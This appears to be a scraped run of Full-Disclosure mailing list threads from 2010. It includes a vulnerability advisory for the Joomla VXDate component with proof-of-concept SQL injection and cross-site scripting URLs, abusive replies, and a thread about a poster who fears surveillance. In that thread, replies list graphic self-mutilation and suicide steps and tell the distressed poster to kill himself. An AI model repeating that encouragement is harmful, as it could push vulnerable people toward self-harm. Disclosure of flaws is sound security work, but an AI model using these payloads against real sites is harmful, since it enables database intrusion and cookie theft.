7 month to inform the dev's, what kind of asshole are you ? Oh wait, were you hacking some n00bs website, with your shitty dork ? 2010/3/17 MustLive mustl...@websecurity.com.ua Hello Full-Disclosure! I want to warn you about vulnerabilities in component VXDate for Joomla. - Advisory: Vulnerabilities in VXDate for Joomla - URL: http://websecurity.com.ua/3849/ - Timeline: 10.05.2009 - found the vulnerabilities. 12.01.2010 - announced at my site. 18.01.2010 - informed developers. 13.03.2010 - disclosed at my site. - Details: These are Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities. Full path disclosure: http://site/index.php?option=com_vxdatect=’ http://site/index.php?option=com_vxdatect=1md=detailsid=’ http://site/index.php?option=com_vxdatect=1md=editformid=’ SQL Injection: http://site/index.php?option=com_vxdatect=1md=detailsid=-1%20or%20version()=5 http://site/index.php?option=com_vxdatect=1md=editformid=-1%20or%20version()=5 XSS: http://site/index.php?option=com_vxdatect=1md=detailsid=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://site/index.php?option=com_vxdatect=1md=editformid=%3Cscript%3Ealert(document.cookie)%3C/script%3E Vulnerable are potentially all versions of VXDate. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SQL DB Structure Extraction vulnerabilities
No shit eh ? All your post are pure shit, it's a fucking spam made to redirect some dummy users to your crapy website. Seriously dude, from now on spam your .ua mailing list instead of FD. On Thu, Mar 18, 2010 at 8:36 AM, MustLive mustl...@websecurity.com.uawrote: Hello Full-Disclosure! Yesterday I wrote English version of my article SQL DB Structure Extraction vulnerabilities (http://websecurity.com.ua/4038/). There is such variety of Information Leakage vulnerabilities as SQL DB Structure Extraction. This vulnerability lie in that there is information leakage in web application about structure of the database. This information leakage can be of use at SQL Injection attack. Such vulnerability I found first time already in 2006 (at one site) and gave it this name. Such vulnerabilities I found at many web sites and also in many web applications. In the article I talked about SQL DB Structure Extraction, different variants of SQL Errors (three variants) and about difference between SQL DB Structure Extraction and SQL Error. You can read the article SQL DB Structure Extraction vulnerabilities at my site: http://websecurity.com.ua/4038/ Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
On Sun, Mar 21, 2010 at 10:41 PM, Mark Byrne boogiebr...@yahoo.co.uk wrote: this mailing list has, over the last 6 months or so (at least) been full of immature script-kiddy dicks I think its funny that he has been pretending to be me for over 12 months non-stop and failed miserably. Please try harder Son of Ram, I need more content to forward to SOCA so they can prosecute you. Remember and here is a quote from Andy Auld, head of intelligence at SOCA's e-crime department: “The legal system doesn’t work against nicknames and email addresses. It works against real names and real addresses”. http://www.soca.gov.uk/news/172-darkmarket-mastermind-jailed Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
Or village idiot. ;-) --- Christian Sciberras uuf6...@gmail.com schrieb am So, 21.3.2010: Von: Christian Sciberras uuf6...@gmail.com Betreff: Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help. An: Mark Byrne boogiebr...@yahoo.co.uk CC: full-disclosure@lists.grok.org.uk Datum: Sonntag, 21. März, 2010 22:34 Uhr You might want to consider that every mailing list have its own court jester. ;) On Sun, Mar 21, 2010 at 11:25 PM, Mark Byrne boogiebr...@yahoo.co.uk wrote: On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -Integrierter Anhang folgt- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
* Andrew Walberg (andrew.walb...@rocketmail.com) wrote: (...) Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. http://www.skeptictank.org/hs/vanish.htm kind regards, Thomas Penteker -- Vendor no longer supports the product ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/